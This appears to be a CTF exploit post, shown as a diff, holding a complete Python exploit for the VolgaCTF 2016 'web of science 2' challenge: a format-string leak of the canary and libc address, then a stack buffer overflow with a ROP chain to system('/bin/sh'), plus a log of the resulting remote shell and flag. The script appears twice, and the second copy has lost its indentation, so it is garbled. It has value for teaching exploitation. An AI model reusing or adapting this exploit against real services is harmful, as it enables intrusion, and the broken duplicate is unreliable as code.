LiveOverflow · March 28, 2016 11:03
diff --git a/web_of_science2.py b/web_of_science2.py
 import socket
 import telnetlib
 import struct
 import hashlib
 import random

 """
 root $ python web_of_science2.py
 [*] connected to webofscience2.2016.volgactf.ru:45679
 [+] recv: 'Tell me your name first\n'
 [*] send format string to leak addresses
 [+] recv: 'Alright, pass a little test first, would you.\n3668 + 8932 = ?\ncanary:|||985e5f08a2bbd800||| srand@GOT:|||\xa0Yg\xf7\xff\x7f||| stack:|||7fffffffeba0|||, your response: '
 [*] stack canary: 0x985e5f08a2bbd800
 [*] srand@GOT: 0x7ffff76759a0
 [*] stack: 0x7fffffffeba0
 [*] libc base: 0x7ffff7639000
 [*] system(): 0x7ffff767f640
 [+] Solving the 0. sum: 3668 + 8932 = 12600
 [+] Solving the 1. sum: 45317 + 33218 = 78535
 [+] Solving the 2. sum: 40618 + 20647 = 61265
 [+] Solving the 3. sum: 7894 + 26236 = 34130
 [+] Solving the 4. sum: 47062 + 28527 = 75589
 [+] Solving the 5. sum: 58563 + 25165 = 83728
 [+] Solving the 6. sum: 43846 + 3454 = 47300
 [+] Solving the 7. sum: 25307 + 25358 = 50665
 [+] Solving the 8. sum: 41468 + 10092 = 51560
 [+] Solving the 9. sum: 5859 + 28760 = 34619
 [*] Sending the buffer overflow
 [*] Exit the menu, to trigger the `ret`
 [*] here is your shell:
 Linux Ubuntu1404x64 3.13.0-83-generic #127-Ubuntu SMP Fri Mar 11 00:25:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
 ls -la
 total 32
 drwxr-xr-x  2 root root  4096 Mar 26 08:11 .
 drwxr-xr-x 22 root root  4096 Mar 26 07:43 ..
 -rw-r--r--  1 root root    37 Mar 26 07:47 flag_wos2.txt
 -rwxr-xr-x  1 root root    85 Mar 26 07:47 install
 -rwxr-xr-x  1 root root   295 Mar 26 08:11 start_wos2
 -rwxr-xr-x  1 root root 10504 Mar 26 07:47 web_of_science2
 cat flag_wos2.txt
 VolgaCTF{DEP_with0ut_ASLR_is_us3less}
 """

 REMOTE = True


 def padzero(s):
    return s+"\x00"*(8-len(s))


 def recv_all(s):
    b = ""
    last_recv = True
    while last_recv:
        try:
            last_recv = s.recv(1024)
        except socket.timeout:
            last_recv = None
        if last_recv:
            b += last_recv
    return b

 # socat TCP-LISTEN:1337,reuseaddr,fork EXEC:"./web_of_science2"
 SERVER = ('localhost', 1337)
 SRANDOM_OFFSET = 0x3c9a0
 SYSTEM_OFFSET = 0x46640
 POP_RDI_OFFSET = 0x22b1a

 if REMOTE:
    SERVER = ('webofscience2.2016.volgactf.ru', 45679)

 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

 s.connect(SERVER)
 s.settimeout(0.5)
 print("[*] connected to {}:{}".format(SERVER[0], SERVER[1]))

 r = recv_all(s)
 print("[+] recv: {}".format(repr(r)))


 print("[*] send format string to leak addresses")
 s.sendall("canary:|||%43$llx||| srand@GOT:|||%23$s||| stack:|||%46$llx|||\n")

 r = recv_all(s)
 print("[+] recv: {}".format(repr(r)))
 canary = int(r.split('|||')[1], 16)
 srand = struct.unpack("Q", padzero(r.split('|||')[3]))[0]
 stack = int(r.split('|||')[5], 16)
 libc = srand - SRANDOM_OFFSET
 system = libc + SYSTEM_OFFSET
 pop_rdi = libc + POP_RDI_OFFSET
 print("[*] stack canary: 0x{:x}".format(canary))
 print("[*] srand@GOT: 0x{:x}".format(srand))
 print("[*] stack: 0x{:x}".format(stack))
 print "[*] libc base: 0x{:x}".format(libc)
 print "[*] system(): 0x{:x}".format(system)

 for i in xrange(0, 10):
    for l in r.split("\n"):
        if '=' in l:
            chall = l.split(" ")
            summe = int(chall[0])+int(chall[2])
            print("[+] Solving the {}. sum: {} + {} = {}".format(i, chall[0], chall[2], summe))
            s.sendall(str(summe)+"\n")
    r = recv_all(s)

 print "[*] Sending the buffer overflow"
 s.sendall("AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEE"+struct.pack("Q", canary)+"GGGGGGGG"+struct.pack("Q", pop_rdi)+struct.pack("Q", stack)+struct.pack("Q", system)+"/bin/sh;/bin/sh;/bin/sh;/bin/sh;/bin/sh;/bin/sh;/bin/sh;\n")
 print "[*] Exit the menu, to trigger the `ret`"
 s.sendall("5\n")
 # ignore the menu output
 _ = recv_all(s)
 print "[*] here is your shell:"
 s.sendall("uname -a\n")
 s.sendall("id\n")
 t = telnetlib.Telnet()
 t.sock = s
 t.interact()
	import socket
	import telnetlib
	import struct
	import hashlib
	import random

	"""
	root $ python web_of_science2.py
	[*] connected to webofscience2.2016.volgactf.ru:45679
	[+] recv: 'Tell me your name first\n'
	[*] send format string to leak addresses
	[+] recv: 'Alright, pass a little test first, would you.\n3668 + 8932 = ?\ncanary:\|\|\|985e5f08a2bbd800\|\|\| srand@GOT:\|\|\|\xa0Yg\xf7\xff\x7f\|\|\| stack:\|\|\|7fffffffeba0\|\|\|, your response: '
	[*] stack canary: 0x985e5f08a2bbd800
	[*] srand@GOT: 0x7ffff76759a0
	[*] stack: 0x7fffffffeba0
	[*] libc base: 0x7ffff7639000
	[*] system(): 0x7ffff767f640
	[+] Solving the 0. sum: 3668 + 8932 = 12600
	[+] Solving the 1. sum: 45317 + 33218 = 78535
	[+] Solving the 2. sum: 40618 + 20647 = 61265
	[+] Solving the 3. sum: 7894 + 26236 = 34130
	[+] Solving the 4. sum: 47062 + 28527 = 75589
	[+] Solving the 5. sum: 58563 + 25165 = 83728
	[+] Solving the 6. sum: 43846 + 3454 = 47300
	[+] Solving the 7. sum: 25307 + 25358 = 50665
	[+] Solving the 8. sum: 41468 + 10092 = 51560
	[+] Solving the 9. sum: 5859 + 28760 = 34619
	[*] Sending the buffer overflow
	[*] Exit the menu, to trigger the `ret`
	[*] here is your shell:
	Linux Ubuntu1404x64 3.13.0-83-generic #127-Ubuntu SMP Fri Mar 11 00:25:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
	uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
	ls -la
	total 32
	drwxr-xr-x 2 root root 4096 Mar 26 08:11 .
	drwxr-xr-x 22 root root 4096 Mar 26 07:43 ..
	-rw-r--r-- 1 root root 37 Mar 26 07:47 flag_wos2.txt
	-rwxr-xr-x 1 root root 85 Mar 26 07:47 install
	-rwxr-xr-x 1 root root 295 Mar 26 08:11 start_wos2
	-rwxr-xr-x 1 root root 10504 Mar 26 07:47 web_of_science2
	cat flag_wos2.txt
	VolgaCTF{DEP_with0ut_ASLR_is_us3less}
	"""

	REMOTE = True


	def padzero(s):
	return s+"\x00"*(8-len(s))


	def recv_all(s):
	b = ""
	last_recv = True
	while last_recv:
	try:
	last_recv = s.recv(1024)
	except socket.timeout:
	last_recv = None
	if last_recv:
	b += last_recv
	return b

	# socat TCP-LISTEN:1337,reuseaddr,fork EXEC:"./web_of_science2"
	SERVER = ('localhost', 1337)
	SRANDOM_OFFSET = 0x3c9a0
	SYSTEM_OFFSET = 0x46640
	POP_RDI_OFFSET = 0x22b1a

	if REMOTE:
	SERVER = ('webofscience2.2016.volgactf.ru', 45679)

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

	s.connect(SERVER)
	s.settimeout(0.5)
	print("[*] connected to {}:{}".format(SERVER[0], SERVER[1]))

	r = recv_all(s)
	print("[+] recv: {}".format(repr(r)))


	print("[*] send format string to leak addresses")
	s.sendall("canary:\|\|\|%43$llx\|\|\| srand@GOT:\|\|\|%23$s\|\|\| stack:\|\|\|%46$llx\|\|\|\n")

	r = recv_all(s)
	print("[+] recv: {}".format(repr(r)))
	canary = int(r.split('\|\|\|')[1], 16)
	srand = struct.unpack("Q", padzero(r.split('\|\|\|')[3]))[0]
	stack = int(r.split('\|\|\|')[5], 16)
	libc = srand - SRANDOM_OFFSET
	system = libc + SYSTEM_OFFSET
	pop_rdi = libc + POP_RDI_OFFSET
	print("[*] stack canary: 0x{:x}".format(canary))
	print("[*] srand@GOT: 0x{:x}".format(srand))
	print("[*] stack: 0x{:x}".format(stack))
	print "[*] libc base: 0x{:x}".format(libc)
	print "[*] system(): 0x{:x}".format(system)

	for i in xrange(0, 10):
	for l in r.split("\n"):
	if '=' in l:
	chall = l.split(" ")
	summe = int(chall[0])+int(chall[2])
	print("[+] Solving the {}. sum: {} + {} = {}".format(i, chall[0], chall[2], summe))
	s.sendall(str(summe)+"\n")
	r = recv_all(s)

	print "[*] Sending the buffer overflow"
	s.sendall("AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEE"+struct.pack("Q", canary)+"GGGGGGGG"+struct.pack("Q", pop_rdi)+struct.pack("Q", stack)+struct.pack("Q", system)+"/bin/sh;/bin/sh;/bin/sh;/bin/sh;/bin/sh;/bin/sh;/bin/sh;\n")
	print "[*] Exit the menu, to trigger the `ret`"
	s.sendall("5\n")
	# ignore the menu output
	_ = recv_all(s)
	print "[*] here is your shell:"
	s.sendall("uname -a\n")
	s.sendall("id\n")
	t = telnetlib.Telnet()
	t.sock = s
	t.interact()